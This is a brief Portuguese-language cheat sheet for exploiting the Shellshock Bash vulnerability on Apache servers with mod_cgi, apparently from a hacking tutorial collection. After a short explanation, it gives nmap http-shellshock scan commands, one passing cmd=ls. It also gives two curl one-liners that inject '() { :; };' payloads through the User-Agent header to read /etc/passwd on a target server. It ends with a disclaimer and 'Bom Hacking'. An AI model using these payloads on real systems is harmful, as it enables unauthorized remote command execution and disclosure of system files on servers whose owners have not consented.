
Exploração da vulnerabilidade "Shellshock". Execução remota de código no Apache com mod_cgi
Shellshock é efetivamente uma vulnerabilidade de Execução Remota de Comandos no BASH. Este script explora a vulnerabilidade no ambiente web em Apache ou similares com mod_cgi habilitado. A vulnerabilidade reside na manipulação de variáveis de ambiente, que são valores nomeados dinâmicos que afetam como os processos são executados em um computador. Atacantes podem explorar isso anexando código malicioso a variáveis de ambiente, que é executado ao receber a variável. Isso permite que atacantes potencialmente comprometam o sistema.
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
Não sou responsável por qualquer uso ilegal ou dano causado por esta ferramenta. Foi escrita por diversão, não para o mal, e tem como objetivo conscientizar sobre hacking e segurança cibernética
Bom Hacking :)